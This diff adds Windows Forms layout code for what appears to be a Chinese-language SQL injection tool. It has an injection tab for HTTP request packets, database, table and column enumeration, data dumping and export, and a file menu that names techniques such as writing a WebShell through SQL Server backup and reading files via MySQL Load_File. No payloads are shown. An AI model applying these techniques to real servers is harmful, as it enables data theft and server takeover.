+ this.groupBox7.Controls.Add(this.file_btn_start);
+ this.groupBox7.Controls.Add(this.file_cbox_readWrite);
+ this.groupBox7.Controls.Add(this.file_txt_filePath);
+ this.groupBox7.Controls.Add(this.label14);
+ this.groupBox7.Controls.Add(this.cbox_file_readFileEncoding);
+ this.groupBox7.Controls.Add(this.label24);
+ this.groupBox7.Dock = System.Windows.Forms.DockStyle.Top;
+ this.groupBox7.Location = new System.Drawing.Point(0, 0);
+ this.groupBox7.Name = "groupBox7";
+ this.groupBox7.Size = new System.Drawing.Size(802, 76);
+ this.groupBox7.TabIndex = 0;
+ this.groupBox7.TabStop = false;
+ this.groupBox7.Text = "文件操作";
+ //
+ // file_btn_start
+ //
+ this.file_btn_start.Location = new System.Drawing.Point(695, 31);
+ this.file_btn_start.Name = "file_btn_start";
+ this.file_btn_start.Size = new System.Drawing.Size(75, 23);
+ this.file_btn_start.TabIndex = 12;
+ this.file_btn_start.Text = "开始";
+ this.file_btn_start.UseVisualStyleBackColor = true;
+ this.file_btn_start.Click += new System.EventHandler(this.file_btn_start_Click);
+ //
+ // file_cbox_readWrite
+ //
+ this.file_cbox_readWrite.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList;
+ this.file_cbox_readWrite.FormattingEnabled = true;
+ this.file_cbox_readWrite.Items.AddRange(new object[] {
+ "MySQL Load_File读文件",
+ "MySQL Union写文件",
+ "SQLServer FileSystemObject写文件",
+ "SQLServer Sp_MakeWebTask写文件",
+ "SQLServer 备份写WebShell(有多余数据)",
+ "SQLServer FileSystemObject读文件",
+ "加载获取IIS虚拟网站信息VBS"});
+ this.file_cbox_readWrite.Location = new System.Drawing.Point(409, 31);
+ this.file_cbox_readWrite.Name = "file_cbox_readWrite";
+ this.file_cbox_readWrite.Size = new System.Drawing.Size(274, 20);
+ this.file_cbox_readWrite.TabIndex = 2;
+ this.file_cbox_readWrite.SelectedIndexChanged += new System.EventHandler(this.file_cbox_readWrite_SelectedIndexChanged);
+ //
+ // file_txt_filePath
+ //
+ this.file_txt_filePath.Location = new System.Drawing.Point(85, 30);
+ this.file_txt_filePath.Name = "file_txt_filePath";
+ this.file_txt_filePath.Size = new System.Drawing.Size(158, 21);
+ this.file_txt_filePath.TabIndex = 1;
+ //
+ // label14
+ //
+ this.label14.AutoSize = true;
+ this.label14.Location = new System.Drawing.Point(32, 33);
+ this.label14.Name = "label14";
+ this.label14.Size = new System.Drawing.Size(47, 12);
+ this.label14.TabIndex = 0;
+ this.label14.Text = "路 径:";
+ //
+ // cbox_file_readFileEncoding
+ //
+ this.cbox_file_readFileEncoding.FormattingEnabled = true;
+ this.cbox_file_readFileEncoding.Items.AddRange(new object[] {
+ "UTF-8",
+ "GB2312",
+ "GBK",
+ "ISO-8859-1"});
+ this.cbox_file_readFileEncoding.Location = new System.Drawing.Point(325, 31);
+ this.cbox_file_readFileEncoding.Name = "cbox_file_readFileEncoding";
+ this.cbox_file_readFileEncoding.Size = new System.Drawing.Size(78, 20);
+ this.cbox_file_readFileEncoding.TabIndex = 8;
+ this.cbox_file_readFileEncoding.SelectedValueChanged += new System.EventHandler(this.cbox_file_readFileEncoding_SelectedValueChanged);
+ //
+ // label24
+ //
+ this.label24.AutoSize = true;
+ this.label24.Location = new System.Drawing.Point(253, 33);
+ this.label24.Name = "label24";
+ this.label24.Size = new System.Drawing.Size(65, 12);
+ this.label24.TabIndex = 2;
+ this.label24.Text = "文件编码:";
+ //
+ // tab_dataCenter
+ //
+ this.tab_dataCenter.Controls.Add(this.tabC_dataCenter);
+ this.tab_dataCenter.ImageKey = "db.png";
+ this.tab_dataCenter.Location = new System.Drawing.Point(4, 23);
+ this.tab_dataCenter.Name = "tab_dataCenter";
+ this.tab_dataCenter.Padding = new System.Windows.Forms.Padding(3);
+ this.tab_dataCenter.Size = new System.Drawing.Size(802, 424);
+ this.tab_dataCenter.TabIndex = 1;
+ this.tab_dataCenter.Text = "数据中心";
+ this.tab_dataCenter.UseVisualStyleBackColor = true;
+ //
+ // tabC_dataCenter
+ //
+ this.tabC_dataCenter.Controls.Add(this.tab_vers);
+ this.tabC_dataCenter.Controls.Add(this.tab_dbs);
+ this.tabC_dataCenter.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.tabC_dataCenter.ImageList = this.myicon_list;
+ this.tabC_dataCenter.Location = new System.Drawing.Point(3, 3);
+ this.tabC_dataCenter.Name = "tabC_dataCenter";
+ this.tabC_dataCenter.SelectedIndex = 0;
+ this.tabC_dataCenter.Size = new System.Drawing.Size(796, 418);
+ this.tabC_dataCenter.TabIndex = 2;
+ //
+ // tab_vers
+ //
+ this.tab_vers.Controls.Add(this.data_lvw_ver);
+ this.tab_vers.Location = new System.Drawing.Point(4, 23);
+ this.tab_vers.Name = "tab_vers";
+ this.tab_vers.Padding = new System.Windows.Forms.Padding(3);
+ this.tab_vers.Size = new System.Drawing.Size(788, 391);
+ this.tab_vers.TabIndex = 0;
+ this.tab_vers.Text = "环境变量";
+ this.tab_vers.UseVisualStyleBackColor = true;
+ //
+ // data_lvw_ver
+ //
+ this.data_lvw_ver.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
+ this.data_lvw_ver_verName,
+ this.data_lvw_ver_verValue});
+ this.data_lvw_ver.ContextMenuStrip = this.data_cms_vers;
+ this.data_lvw_ver.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.data_lvw_ver.FullRowSelect = true;
+ this.data_lvw_ver.Location = new System.Drawing.Point(3, 3);
+ this.data_lvw_ver.Name = "data_lvw_ver";
+ this.data_lvw_ver.Size = new System.Drawing.Size(782, 385);
+ this.data_lvw_ver.TabIndex = 0;
+ this.data_lvw_ver.UseCompatibleStateImageBehavior = false;
+ this.data_lvw_ver.View = System.Windows.Forms.View.Details;
+ //
+ // data_lvw_ver_verName
+ //
+ this.data_lvw_ver_verName.Text = "变量名";
+ this.data_lvw_ver_verName.Width = 200;
+ //
+ // data_lvw_ver_verValue
+ //
+ this.data_lvw_ver_verValue.Text = "变量值";
+ this.data_lvw_ver_verValue.Width = 474;
+ //
+ // data_cms_vers
+ //
+ this.data_cms_vers.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.data_cms_tsmi_getVariable,
+ this.data_cms_tsmi_stopGetVariable,
+ this.data_cms_tsmi_copyVerValue});
+ this.data_cms_vers.Name = "data_cms_getVariable";
+ this.data_cms_vers.Size = new System.Drawing.Size(149, 70);
+ //
+ // data_cms_tsmi_getVariable
+ //
+ this.data_cms_tsmi_getVariable.Name = "data_cms_tsmi_getVariable";
+ this.data_cms_tsmi_getVariable.Size = new System.Drawing.Size(148, 22);
+ this.data_cms_tsmi_getVariable.Text = "获取环境变量";
+ this.data_cms_tsmi_getVariable.Click += new System.EventHandler(this.data_cms_tsmi_getVariable_Click);
+ //
+ // data_cms_tsmi_stopGetVariable
+ //
+ this.data_cms_tsmi_stopGetVariable.Name = "data_cms_tsmi_stopGetVariable";
+ this.data_cms_tsmi_stopGetVariable.Size = new System.Drawing.Size(148, 22);
+ this.data_cms_tsmi_stopGetVariable.Text = "立即停止";
+ this.data_cms_tsmi_stopGetVariable.Click += new System.EventHandler(this.data_cms_tsmi_stopGetVariable_Click);
+ //
+ // data_cms_tsmi_copyVerValue
+ //
+ this.data_cms_tsmi_copyVerValue.Name = "data_cms_tsmi_copyVerValue";
+ this.data_cms_tsmi_copyVerValue.Size = new System.Drawing.Size(148, 22);
+ this.data_cms_tsmi_copyVerValue.Text = "复制变量值";
+ this.data_cms_tsmi_copyVerValue.Click += new System.EventHandler(this.data_cms_tsmi_copyVerValue_Click);
+ //
+ // tab_dbs
+ //
+ this.tab_dbs.Controls.Add(this.spc_dbs);
+ this.tab_dbs.Location = new System.Drawing.Point(4, 23);
+ this.tab_dbs.Name = "tab_dbs";
+ this.tab_dbs.Padding = new System.Windows.Forms.Padding(3);
+ this.tab_dbs.Size = new System.Drawing.Size(788, 391);
+ this.tab_dbs.TabIndex = 1;
+ this.tab_dbs.Text = "数据库信息";
+ this.tab_dbs.UseVisualStyleBackColor = true;
+ //
+ // spc_dbs
+ //
+ this.spc_dbs.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.spc_dbs.Location = new System.Drawing.Point(3, 3);
+ this.spc_dbs.Name = "spc_dbs";
+ //
+ // spc_dbs.Panel1
+ //
+ this.spc_dbs.Panel1.Controls.Add(this.data_dbs_ts);
+ this.spc_dbs.Panel1.Controls.Add(this.groupBox2);
+ //
+ // spc_dbs.Panel2
+ //
+ this.spc_dbs.Panel2.Controls.Add(this.toolStrip1);
+ this.spc_dbs.Panel2.Controls.Add(this.groupBox4);
+ this.spc_dbs.Size = new System.Drawing.Size(782, 385);
+ this.spc_dbs.SplitterDistance = 225;
+ this.spc_dbs.TabIndex = 5;
+ //
+ // data_dbs_ts
+ //
+ this.data_dbs_ts.Dock = System.Windows.Forms.DockStyle.Bottom;
+ this.data_dbs_ts.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.data_dbs_tsl_getDBS,
+ this.data_dbs_tsl_getTables,
+ this.data_dbs_tsl_getColumns});
+ this.data_dbs_ts.Location = new System.Drawing.Point(0, 360);
+ this.data_dbs_ts.Name = "data_dbs_ts";
+ this.data_dbs_ts.Padding = new System.Windows.Forms.Padding(5, 0, 0, 0);
+ this.data_dbs_ts.RenderMode = System.Windows.Forms.ToolStripRenderMode.System;
+ this.data_dbs_ts.Size = new System.Drawing.Size(225, 25);
+ this.data_dbs_ts.TabIndex = 4;
+ this.data_dbs_ts.Text = "toolStrip1";
+ //
+ // data_dbs_tsl_getDBS
+ //
+ this.data_dbs_tsl_getDBS.DisplayStyle = System.Windows.Forms.ToolStripItemDisplayStyle.Text;
+ this.data_dbs_tsl_getDBS.Image = ((System.Drawing.Image)(resources.GetObject("data_dbs_tsl_getDBS.Image")));
+ this.data_dbs_tsl_getDBS.ImageTransparentColor = System.Drawing.Color.Magenta;
+ this.data_dbs_tsl_getDBS.Name = "data_dbs_tsl_getDBS";
+ this.data_dbs_tsl_getDBS.Size = new System.Drawing.Size(56, 22);
+ this.data_dbs_tsl_getDBS.Text = "获 取 库";
+ this.data_dbs_tsl_getDBS.Click += new System.EventHandler(this.data_dbs_tsl_getDBS_Click);
+ //
+ // data_dbs_tsl_getTables
+ //
+ this.data_dbs_tsl_getTables.DisplayStyle = System.Windows.Forms.ToolStripItemDisplayStyle.Text;
+ this.data_dbs_tsl_getTables.Image = ((System.Drawing.Image)(resources.GetObject("data_dbs_tsl_getTables.Image")));
+ this.data_dbs_tsl_getTables.ImageTransparentColor = System.Drawing.Color.Magenta;
+ this.data_dbs_tsl_getTables.Name = "data_dbs_tsl_getTables";
+ this.data_dbs_tsl_getTables.Size = new System.Drawing.Size(56, 22);
+ this.data_dbs_tsl_getTables.Text = "获 取 表";
+ this.data_dbs_tsl_getTables.Click += new System.EventHandler(this.data_dbs_tsl_getTables_Click);
+ //
+ // data_dbs_tsl_getColumns
+ //
+ this.data_dbs_tsl_getColumns.DisplayStyle = System.Windows.Forms.ToolStripItemDisplayStyle.Text;
+ this.data_dbs_tsl_getColumns.Image = ((System.Drawing.Image)(resources.GetObject("data_dbs_tsl_getColumns.Image")));
+ this.data_dbs_tsl_getColumns.ImageTransparentColor = System.Drawing.Color.Magenta;
+ this.data_dbs_tsl_getColumns.Name = "data_dbs_tsl_getColumns";
+ this.data_dbs_tsl_getColumns.Size = new System.Drawing.Size(56, 22);
+ this.data_dbs_tsl_getColumns.Text = "获 取 列";
+ this.data_dbs_tsl_getColumns.Click += new System.EventHandler(this.data_dbs_tsl_getColumns_Click);
+ //
+ // groupBox2
+ //
+ this.groupBox2.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
+ | System.Windows.Forms.AnchorStyles.Left)
+ | System.Windows.Forms.AnchorStyles.Right)));
+ this.groupBox2.Controls.Add(this.data_tvw_dbs);
+ this.groupBox2.Location = new System.Drawing.Point(5, 5);
+ this.groupBox2.Name = "groupBox2";
+ this.groupBox2.Size = new System.Drawing.Size(220, 352);
+ this.groupBox2.TabIndex = 0;
+ this.groupBox2.TabStop = false;
+ this.groupBox2.Text = "数据库信息";
+ //
+ // data_tvw_dbs
+ //
+ this.data_tvw_dbs.BorderStyle = System.Windows.Forms.BorderStyle.None;
+ this.data_tvw_dbs.CheckBoxes = true;
+ this.data_tvw_dbs.ContextMenuStrip = this.data_cms_dbs;
+ this.data_tvw_dbs.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.data_tvw_dbs.ImageIndex = 0;
+ this.data_tvw_dbs.ImageList = this.imglist_database;
+ this.data_tvw_dbs.LabelEdit = true;
+ this.data_tvw_dbs.Location = new System.Drawing.Point(3, 17);
+ this.data_tvw_dbs.Name = "data_tvw_dbs";
+ this.data_tvw_dbs.SelectedImageIndex = 6;
+ this.data_tvw_dbs.Size = new System.Drawing.Size(214, 332);
+ this.data_tvw_dbs.TabIndex = 0;
+ this.data_tvw_dbs.AfterCheck += new System.Windows.Forms.TreeViewEventHandler(this.data_tvw_dbs_AfterCheck);
+ this.data_tvw_dbs.AfterSelect += new System.Windows.Forms.TreeViewEventHandler(this.data_tvw_dbs_AfterSelect);
+ //
+ // data_cms_dbs
+ //
+ this.data_cms_dbs.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.data_dbs_tsmi_addDBS,
+ this.data_dbs_tsmi_addTableOrColumn,
+ this.data_dbs_tsmi_getTableNames,
+ this.data_dbs_tsmi_deleteNode,
+ this.data_dbs_tsmi_stopGetInfos,
+ this.data_dbs_tsmi_saveDTCStruct,
+ this.data_dbs_tsmi_loadDTCStruct,
+ this.data_dbs_tsmi_clearDTCStruct});
+ this.data_cms_dbs.Name = "data_cms_getVariable";
+ this.data_cms_dbs.Size = new System.Drawing.Size(161, 180);
+ //
+ // data_dbs_tsmi_addDBS
+ //
+ this.data_dbs_tsmi_addDBS.Name = "data_dbs_tsmi_addDBS";
+ this.data_dbs_tsmi_addDBS.Size = new System.Drawing.Size(160, 22);
+ this.data_dbs_tsmi_addDBS.Text = "添加数据库";
+ this.data_dbs_tsmi_addDBS.Click += new System.EventHandler(this.data_dbs_tsmi_addDBS_Click);
+ //
+ // data_dbs_tsmi_addTableOrColumn
+ //
+ this.data_dbs_tsmi_addTableOrColumn.Name = "data_dbs_tsmi_addTableOrColumn";
+ this.data_dbs_tsmi_addTableOrColumn.Size = new System.Drawing.Size(160, 22);
+ this.data_dbs_tsmi_addTableOrColumn.Text = "添加表或列";
+ this.data_dbs_tsmi_addTableOrColumn.Click += new System.EventHandler(this.data_dbs_tsmi_addTableOrColumn_Click);
+ //
+ // data_dbs_tsmi_getTableNames
+ //
+ this.data_dbs_tsmi_getTableNames.Name = "data_dbs_tsmi_getTableNames";
+ this.data_dbs_tsmi_getTableNames.Size = new System.Drawing.Size(160, 22);
+ this.data_dbs_tsmi_getTableNames.Text = "修改节点";
+ this.data_dbs_tsmi_getTableNames.Click += new System.EventHandler(this.data_dbs_tsmi_getTableNames_Click);
+ //
+ // data_dbs_tsmi_deleteNode
+ //
+ this.data_dbs_tsmi_deleteNode.Name = "data_dbs_tsmi_deleteNode";
+ this.data_dbs_tsmi_deleteNode.Size = new System.Drawing.Size(160, 22);
+ this.data_dbs_tsmi_deleteNode.Text = "删除节点";
+ this.data_dbs_tsmi_deleteNode.Click += new System.EventHandler(this.data_dbs_tsmi_deleteNode_Click);
+ //
+ // data_dbs_tsmi_stopGetInfos
+ //
+ this.data_dbs_tsmi_stopGetInfos.Name = "data_dbs_tsmi_stopGetInfos";
+ this.data_dbs_tsmi_stopGetInfos.Size = new System.Drawing.Size(160, 22);
+ this.data_dbs_tsmi_stopGetInfos.Text = "立即停止";
+ this.data_dbs_tsmi_stopGetInfos.Click += new System.EventHandler(this.data_dbs_tsmi_stopGetInfos_Click);
+ //
+ // data_dbs_tsmi_saveDTCStruct
+ //
+ this.data_dbs_tsmi_saveDTCStruct.Name = "data_dbs_tsmi_saveDTCStruct";
+ this.data_dbs_tsmi_saveDTCStruct.Size = new System.Drawing.Size(160, 22);
+ this.data_dbs_tsmi_saveDTCStruct.Text = "保存库表列结构";
+ this.data_dbs_tsmi_saveDTCStruct.Click += new System.EventHandler(this.data_dbs_tsmi_saveDTCStruct_Click);
+ //
+ // data_dbs_tsmi_loadDTCStruct
+ //
+ this.data_dbs_tsmi_loadDTCStruct.Name = "data_dbs_tsmi_loadDTCStruct";
+ this.data_dbs_tsmi_loadDTCStruct.Size = new System.Drawing.Size(160, 22);
+ this.data_dbs_tsmi_loadDTCStruct.Text = "加载库表列结构";
+ this.data_dbs_tsmi_loadDTCStruct.Click += new System.EventHandler(this.data_dbs_tsmi_loadDTCStruct_Click);
+ //
+ // data_dbs_tsmi_clearDTCStruct
+ //
+ this.data_dbs_tsmi_clearDTCStruct.Name = "data_dbs_tsmi_clearDTCStruct";
+ this.data_dbs_tsmi_clearDTCStruct.Size = new System.Drawing.Size(160, 22);
+ this.data_dbs_tsmi_clearDTCStruct.Text = "清空所有结构";
+ this.data_dbs_tsmi_clearDTCStruct.Click += new System.EventHandler(this.data_dbs_tsmi_clearDTCStruct_Click);
+ //
+ // imglist_database
+ //
+ this.imglist_database.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imglist_database.ImageStream")));
+ this.imglist_database.TransparentColor = System.Drawing.Color.Transparent;
+ this.imglist_database.Images.SetKeyName(0, "db.png");
+ this.imglist_database.Images.SetKeyName(1, "table2.png");
+ this.imglist_database.Images.SetKeyName(2, "column2.png");
+ this.imglist_database.Images.SetKeyName(3, "column.png");
+ this.imglist_database.Images.SetKeyName(4, "column1.png");
+ this.imglist_database.Images.SetKeyName(5, "table1.png");
+ this.imglist_database.Images.SetKeyName(6, "Image_1.png");
+ //
+ // toolStrip1
+ //
+ this.toolStrip1.Dock = System.Windows.Forms.DockStyle.Bottom;
+ this.toolStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.toolStripLabel3,
+ this.data_dbs_txt_start,
+ this.toolStripLabel1,
+ this.data_dbs_txt_count,
+ this.data_dbs_tsl_getDatas,
+ this.data_dbs_tsl_exportDatas,
+ this.toolStripLabel2,
+ this.data_dbs_cob_db_encoding});
+ this.toolStrip1.Location = new System.Drawing.Point(0, 360);
+ this.toolStrip1.Name = "toolStrip1";
+ this.toolStrip1.RenderMode = System.Windows.Forms.ToolStripRenderMode.System;
+ this.toolStrip1.Size = new System.Drawing.Size(553, 25);
+ this.toolStrip1.TabIndex = 5;
+ this.toolStrip1.Text = "toolStrip1";
+ this.toolStrip1.TextChanged += new System.EventHandler(this.toolStrip1_TextChanged);
+ //
+ // toolStripLabel3
+ //
+ this.toolStripLabel3.Name = "toolStripLabel3";
+ this.toolStripLabel3.Size = new System.Drawing.Size(48, 22);
+ this.toolStripLabel3.Text = "开 始:";
+ //
+ // data_dbs_txt_start
+ //
+ this.data_dbs_txt_start.Margin = new System.Windows.Forms.Padding(0);
+ this.data_dbs_txt_start.MaxLength = 9;
+ this.data_dbs_txt_start.Name = "data_dbs_txt_start";
+ this.data_dbs_txt_start.Size = new System.Drawing.Size(50, 25);
+ this.data_dbs_txt_start.Text = "0";
+ //
+ // toolStripLabel1
+ //
+ this.toolStripLabel1.Name = "toolStripLabel1";
+ this.toolStripLabel1.Size = new System.Drawing.Size(48, 22);
+ this.toolStripLabel1.Text = "条 数:";
+ //
+ // data_dbs_txt_count
+ //
+ this.data_dbs_txt_count.MaxLength = 9;
+ this.data_dbs_txt_count.Name = "data_dbs_txt_count";
+ this.data_dbs_txt_count.Size = new System.Drawing.Size(50, 25);
+ this.data_dbs_txt_count.Text = "1";
+ //
+ // data_dbs_tsl_getDatas
+ //
+ this.data_dbs_tsl_getDatas.DisplayStyle = System.Windows.Forms.ToolStripItemDisplayStyle.Text;
+ this.data_dbs_tsl_getDatas.Image = ((System.Drawing.Image)(resources.GetObject("data_dbs_tsl_getDatas.Image")));
+ this.data_dbs_tsl_getDatas.ImageTransparentColor = System.Drawing.Color.Magenta;
+ this.data_dbs_tsl_getDatas.Name = "data_dbs_tsl_getDatas";
+ this.data_dbs_tsl_getDatas.Size = new System.Drawing.Size(60, 22);
+ this.data_dbs_tsl_getDatas.Text = "获取数据";
+ this.data_dbs_tsl_getDatas.Click += new System.EventHandler(this.data_dbs_tsl_getDatas_Click);
+ //
+ // data_dbs_tsl_exportDatas
+ //
+ this.data_dbs_tsl_exportDatas.DisplayStyle = System.Windows.Forms.ToolStripItemDisplayStyle.Text;
+ this.data_dbs_tsl_exportDatas.Image = ((System.Drawing.Image)(resources.GetObject("data_dbs_tsl_exportDatas.Image")));
+ this.data_dbs_tsl_exportDatas.ImageTransparentColor = System.Drawing.Color.Magenta;
+ this.data_dbs_tsl_exportDatas.Name = "data_dbs_tsl_exportDatas";
+ this.data_dbs_tsl_exportDatas.Size = new System.Drawing.Size(60, 22);
+ this.data_dbs_tsl_exportDatas.Text = "导出数据";
+ this.data_dbs_tsl_exportDatas.Click += new System.EventHandler(this.data_dbs_tsl_exportDatas_Click);
+ //
+ // toolStripLabel2
+ //
+ this.toolStripLabel2.Name = "toolStripLabel2";
+ this.toolStripLabel2.Size = new System.Drawing.Size(44, 22);
+ this.toolStripLabel2.Text = "编码:";
+ //
+ // data_dbs_cob_db_encoding
+ //
+ this.data_dbs_cob_db_encoding.Items.AddRange(new object[] {
+ "UTF-8",
+ "GB2312",
+ "GBK",
+ "ISO-8859-1",
+ "EUC-KR"});
+ this.data_dbs_cob_db_encoding.Name = "data_dbs_cob_db_encoding";
+ this.data_dbs_cob_db_encoding.Size = new System.Drawing.Size(75, 25);
+ this.data_dbs_cob_db_encoding.TextChanged += new System.EventHandler(this.data_dbs_cob_db_encoding_TextChanged);
+ //
+ // groupBox4
+ //
+ this.groupBox4.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
+ | System.Windows.Forms.AnchorStyles.Left)
+ | System.Windows.Forms.AnchorStyles.Right)));
+ this.groupBox4.Controls.Add(this.data_dbs_lvw_data);
+ this.groupBox4.Location = new System.Drawing.Point(3, 5);
+ this.groupBox4.Name = "groupBox4";
+ this.groupBox4.Size = new System.Drawing.Size(547, 352);
+ this.groupBox4.TabIndex = 1;
+ this.groupBox4.TabStop = false;
+ this.groupBox4.Text = "获取数据";
+ //
+ // data_dbs_lvw_data
+ //
+ this.data_dbs_lvw_data.BorderStyle = System.Windows.Forms.BorderStyle.None;
+ this.data_dbs_lvw_data.ContextMenuStrip = this.cms_data_dbs_lvw_data;
+ this.data_dbs_lvw_data.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.data_dbs_lvw_data.FullRowSelect = true;
+ this.data_dbs_lvw_data.GridLines = true;
+ this.data_dbs_lvw_data.Location = new System.Drawing.Point(3, 17);
+ this.data_dbs_lvw_data.Name = "data_dbs_lvw_data";
+ this.data_dbs_lvw_data.Size = new System.Drawing.Size(541, 332);
+ this.data_dbs_lvw_data.TabIndex = 1;
+ this.data_dbs_lvw_data.UseCompatibleStateImageBehavior = false;
+ this.data_dbs_lvw_data.View = System.Windows.Forms.View.Details;
+ this.data_dbs_lvw_data.ColumnClick += new System.Windows.Forms.ColumnClickEventHandler(this.data_dbs_lvw_data_ColumnClick);
+ //
+ // cms_data_dbs_lvw_data
+ //
+ this.cms_data_dbs_lvw_data.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.data_dbs_lvw_tsmi_copyLineData,
+ this.data_dbs_lvw_tsmi_stop,
+ this.tsmi_clearColumns});
+ this.cms_data_dbs_lvw_data.Name = "data_cms_getVariable";
+ this.cms_data_dbs_lvw_data.Size = new System.Drawing.Size(149, 70);
+ //
+ // data_dbs_lvw_tsmi_copyLineData
+ //
+ this.data_dbs_lvw_tsmi_copyLineData.Name = "data_dbs_lvw_tsmi_copyLineData";
+ this.data_dbs_lvw_tsmi_copyLineData.Size = new System.Drawing.Size(148, 22);
+ this.data_dbs_lvw_tsmi_copyLineData.Text = "复制此行数据";
+ this.data_dbs_lvw_tsmi_copyLineData.Click += new System.EventHandler(this.data_dbs_lvw_tsmi_copyLineData_Click);
+ //
+ // data_dbs_lvw_tsmi_stop
+ //
+ this.data_dbs_lvw_tsmi_stop.Name = "data_dbs_lvw_tsmi_stop";
+ this.data_dbs_lvw_tsmi_stop.Size = new System.Drawing.Size(148, 22);
+ this.data_dbs_lvw_tsmi_stop.Text = "立即停止";
+ this.data_dbs_lvw_tsmi_stop.Click += new System.EventHandler(this.data_dbs_lvw_tsmi_stop_Click);
+ //
+ // tsmi_clearColumns
+ //
+ this.tsmi_clearColumns.Name = "tsmi_clearColumns";
+ this.tsmi_clearColumns.Size = new System.Drawing.Size(148, 22);
+ this.tsmi_clearColumns.Text = "清 空";
+ this.tsmi_clearColumns.Click += new System.EventHandler(this.tsmi_clearColumns_Click);
+ //
+ // myicon_list
+ //
+ this.myicon_list.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("myicon_list.ImageStream")));
+ this.myicon_list.TransparentColor = System.Drawing.Color.Transparent;
+ this.myicon_list.Images.SetKeyName(0, "Image_1.png");
+ this.myicon_list.Images.SetKeyName(1, "cmd.png");
+ this.myicon_list.Images.SetKeyName(2, "codeChange.png");
+ this.myicon_list.Images.SetKeyName(3, "config.png");
+ this.myicon_list.Images.SetKeyName(4, "convert.png");
+ this.myicon_list.Images.SetKeyName(5, "db.png");
+ this.myicon_list.Images.SetKeyName(6, "editFile.png");
+ this.myicon_list.Images.SetKeyName(7, "log.png");
+ this.myicon_list.Images.SetKeyName(8, "tools.png");
+ this.myicon_list.Images.SetKeyName(9, "scan.png");
+ //
+ // tab_injectCenter
+ //
+ this.tab_injectCenter.Controls.Add(this.groupBox1);
+ this.tab_injectCenter.ImageKey = "config.png";
+ this.tab_injectCenter.Location = new System.Drawing.Point(4, 23);
+ this.tab_injectCenter.Name = "tab_injectCenter";
+ this.tab_injectCenter.Padding = new System.Windows.Forms.Padding(3);
+ this.tab_injectCenter.Size = new System.Drawing.Size(802, 424);
+ this.tab_injectCenter.TabIndex = 0;
+ this.tab_injectCenter.Text = "注入中心";
+ this.tab_injectCenter.UseVisualStyleBackColor = true;
+ //
+ // groupBox1
+ //
+ this.groupBox1.Controls.Add(this.txt_inject_request);
+ this.groupBox1.Controls.Add(this.groupBox3);
+ this.groupBox1.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.groupBox1.Location = new System.Drawing.Point(3, 3);
+ this.groupBox1.Name = "groupBox1";
+ this.groupBox1.Size = new System.Drawing.Size(796, 418);
+ this.groupBox1.TabIndex = 1;
+ this.groupBox1.TabStop = false;
+ this.groupBox1.Text = "数据包";
+ //
+ // txt_inject_request
+ //
+ this.txt_inject_request.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
+ | System.Windows.Forms.AnchorStyles.Left)
+ | System.Windows.Forms.AnchorStyles.Right)));
+ this.txt_inject_request.ContextMenuStrip = this.cms_dataPacks;
+ this.txt_inject_request.Location = new System.Drawing.Point(15, 20);
+ this.txt_inject_request.MaxLength = 1024000;
+ this.txt_inject_request.Multiline = true;
+ this.txt_inject_request.Name = "txt_inject_request";
+ this.txt_inject_request.ScrollBars = System.Windows.Forms.ScrollBars.Vertical;
+ this.txt_inject_request.Size = new System.Drawing.Size(548, 392);
+ this.txt_inject_request.TabIndex = 13;
+ this.txt_inject_request.Text = resources.GetString("txt_inject_request.Text");
+ this.txt_inject_request.TextChanged += new System.EventHandler(this.txt_inject_request_TextChanged);
+ this.txt_inject_request.KeyDown += new System.Windows.Forms.KeyEventHandler(this.txt_inject_request_KeyDown);
+ //
+ // cms_dataPacks
+ //
+ this.cms_dataPacks.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.tsmi_createGetTemplate,
+ this.tsmi_createPOSTTemplate,
+ this.tsmi_changeRequestMethod,
+ this.tsmi_createPackByURL});
+ this.cms_dataPacks.Name = "cms_dataPacks";
+ this.cms_dataPacks.Size = new System.Drawing.Size(184, 92);
+ this.cms_dataPacks.Text = "复制数据";
+ //
+ // tsmi_createGetTemplate
+ //
+ this.tsmi_createGetTemplate.Name = "tsmi_createGetTemplate";
+ this.tsmi_createGetTemplate.Size = new System.Drawing.Size(183, 22);
+ this.tsmi_createGetTemplate.Text = "生成GET模板";
+ this.tsmi_createGetTemplate.Click += new System.EventHandler(this.tsmi_createGetTemplate_Click);
+ //
+ // tsmi_createPOSTTemplate
+ //
+ this.tsmi_createPOSTTemplate.Name = "tsmi_createPOSTTemplate";
+ this.tsmi_createPOSTTemplate.Size = new System.Drawing.Size(183, 22);
+ this.tsmi_createPOSTTemplate.Text = "生成POST模板";
+ this.tsmi_createPOSTTemplate.Click += new System.EventHandler(this.tsmi_createPOSTTemplate_Click);
+ //
+ // tsmi_changeRequestMethod
+ //
+ this.tsmi_changeRequestMethod.Name = "tsmi_changeRequestMethod";
+ this.tsmi_changeRequestMethod.Size = new System.Drawing.Size(183, 22);
+ this.tsmi_changeRequestMethod.Text = "转换提交方式";
+ this.tsmi_changeRequestMethod.Click += new System.EventHandler(this.tsmi_changeRequestMethod_Click);
+ //
+ // tsmi_createPackByURL
+ //
+ this.tsmi_createPackByURL.Name = "tsmi_createPackByURL";
+ this.tsmi_createPackByURL.Size = new System.Drawing.Size(183, 22);
+ this.tsmi_createPackByURL.Text = "根据URL生成数据包";
+ this.tsmi_createPackByURL.Click += new System.EventHandler(this.tsmi_createPackByURL_Click);
+ //
